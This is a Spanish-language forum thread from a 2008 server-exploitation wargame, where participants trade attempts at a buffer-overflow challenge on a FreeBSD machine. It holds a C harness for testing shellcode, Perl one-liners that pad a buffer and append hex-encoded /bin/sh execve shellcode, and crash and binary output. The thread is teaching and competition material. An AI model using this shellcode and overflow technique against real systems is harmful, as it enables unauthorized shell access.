Torneo de explotacion de servidores

Iniciado por sirdarckcat, 15 Noviembre 2008, 17:24 PM

0 Miembros y 2 Visitantes están viendo este tema.

berz3k

#50
Ya estoy dentro desde ayer XD, pero eso es la primera parte, cuando estes dentro te daras cuenta que apenas empieza esto..

-berz3k.

@Anon

Esta muy raro todo, platicando con sdc  esta algo incomodo jugar XDD , el primer BoF aveces funciona y aveces se frezzea no entiendo..


???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????°1I?%A1A°↨I?1U1A°↨I?ë▼^%1A%F♀^F°♂%ó??V♀I?1U%O@I?èÜ ÿÿ/bin/shDè¿¿Dè¿¿
Bad system call
C:/Users/root/Desktop

AlbertoBSD

#51
La cosa va bien :D

Disculpen las molestias tecnicas, si a alguien no se le dejo entrar la hora anterior.
Fue culpa del ISP. que de porsi no dejo hacerlo todo como esta planeado desde el principio. verdad sdc???

Este... Pues seria combeniente que antes de trartar de explotar el bof.

Se pruebe si el shellcode Funciona bien en el sistema. Ya saben a que me refiero.
Ya que ese Bad System Call me suena que no va todo bien.
En fin suerte a todos.

Saludos.
Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW

AlbertoBSD

#52
Efectivamente no estas usando el shellcode correcto.
Lo probe mandandolo solo a ejecutar:

int main()      {
        void (*run)()=(void *)shellcode;
        printf("%d bytes \n",strlen(shellcode));
        run();

        return 0;
}


%gcc testsh.c -o testsh
%./testsh
65 bytes
Bad system call

Busca alguno de los shellcode que he puesto yo.

Saludos.
Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW

sirdarckcat

Cita de: Carloswaldo en 29 Noviembre 2008, 13:49 PM¿No hay pistas?
Seh, NO ES VULNERABILIDAD NIVEL WEB.

Solo hay 1 puerto abierto en el servidor.

La primera parte del reto es encontrar la shell.

lalala..

WHK

#54
Ya entré.

CitarMas facil no se puede xD
    Se esperaban Parametros!!
Uso:
        %s <algo>
  Usted paso como parametro lo siguiente:

%s
calloc(): %s

Esto me recuerda y si es que no me equivoco debe ser el mismo, la prueba que hicieron hace tiempo en la sección de wargames donde alguien prestó su servidor con el mismo sistema donde estamos ahora y al parecer con el mismo programa y con la misma falla  :P solo que la shell no es una shell sino que es un pipe a quien sabe donde.

De todas formas intenté:
Citarsh ./validar `perl -e 'print "?" x 1036'`
aunque en checker y BoF me dió lo mismo: nada.

No soy tan bueno para los bof como berz3k :P

PD: hacen mas de 30 grados de calor y me duele la cabeza a mares :-\
PD2: Busqué en los post anteriores del foro de wargames hasta la última página y ya no está  :huh: supongo que no lo movieron/borraron apropósito vdd?

AlbertoBSD

:D bien.

No no se ha borrado, y no esta en wargames.

Saludos.
Donaciones
1Coffee1jV4gB5gaXfHgSHDz9xx9QSECVW

WHK

#56
Citar$FreeBSD: src/lib/csu/i386-elf/crti.S,v 1.7 2005/05/19 07:31:06 dfr Exp $  Adv
ertencia "/usr/home/warzone/validar"
Solo puede ser ejecutado 10 veces por Usted
Esta vez no cuenta solo le informa el uso:
        Debera ejecutarlo usando path absoluto o relativo
        da igual esto es asu gusto.
Se le pedira el hash del reto N, donde N el ultimo reto que ha Ejecutado
Esto es por seguridad y para evitar un ForceBrute.
Note que cada vez que ejecute los programas vulnerables se va
a generar un Hash Aleatorio

        Saludos y Suerte.

Anon.
/usr/home/warzone/.db/count_ /usr/home/warzone/.db/reto_ %s%d r+ %s w fopen():
%s r    Usted no a ejecutado ningun Reto!
No cuenta esta ejecucion Ejecutado: %d
Hash de la Prueba %d:  Perfecto ;)    /usr/home/warzone/.db/grupos %d %d %d No
es Igual!! ;(  Lo sentimos ya ha sobrepaso el limite de Ejecuciones!!
Guadar calloc(): %s $FreeBSD: src/lib/csu/i386-elf/crtn.S,v 1.6 2005/05/19 07:3
   \♦   $♣   á♠   Óü♦ ¶á┤î    ☺   §   ♀   îà♦

Como es que puedo ejecutarlo solo 10 veces si cuando lo ejecuto me da errores
Citarsh ./validar
‼4: not found
⌂ELF☺☺☺: not found
./validar: 4: Syntax error: "(" unexpected (expecting ")")

No sabía que solo se podía ejecutar 10 veces :-s talves ya la jodí jajaja o talves se ejecute bién cuando logre pasar la primera parte no se pero bueno.

PD: Olvidalo ya se que pasó y estoy viendo lo de la shellcode.

WHK

#57
Ya, me aburrí, mañana será otro dia  :P

Citar./BoF `perl -e 'print "?" x 998'``../xxx/shellcode`
./BoF `perl -e 'print "?" x 1036'``../xxx/shellcode`

CitarSegmentation fault

Probé del 990 al 1070 para ver si me habia equibocado en el tamaño de la shellcode pero nada. y pruebo la shellcode y me lanza la shell pero al bolcar el buffer sobre el BoF no funciona. Para eso tube que modificar de la ejecución a printf guiandome por goodfellas (http://goodfellas.shellcode.com.ar/bsd.html).

Citar$ ./BoF `perl -e 'print "?" x 1035'``../xxx/shellcode`
Mas facil no se puede xD
Usted paso como parametro lo siguiente:
...
Segmentation fault
$

Tampoco ..

Citar./BoF `perl -e 'print "?" x 1056 . "\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh";'`
Mas facil no se puede xD
Usted paso como parametro lo siguiente:
...
Segmentation fault
$
[/quote]

Tampoco, shaaaaaa  :rolleyes:

Citar???????????????????????????????????????Ù↨[1└êCëëC♀PìRS░;P═ÇÞõ   /bin/sh
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
chown: not found
chown: not found
Mas facil no se puede xD
Usted paso como parametro lo siguiente:

¾Ý┐┐☺¯┐┐↕¯┐┐&¯┐┐N¯┐┐V¯┐┐c¯┐┐ǯ┐┐ø¯┐┐ª¯┐┐▓¯┐┐┐¯┐┐╦¯┐┐ί┐┐>´┐┐J´┐┐P´┐┐_´┐┐n´┐┐Ç´┐┐
ò´┐┐ª´┐┐
Segmentation fault
$

NewLog

Warzone está caído? Ahora mismo no puedo acceder...

WHK

Si, no se ve pero la shell anda impecable porque no está dentro del servidor del wargame.

http://shell.wargame.elhacker.net/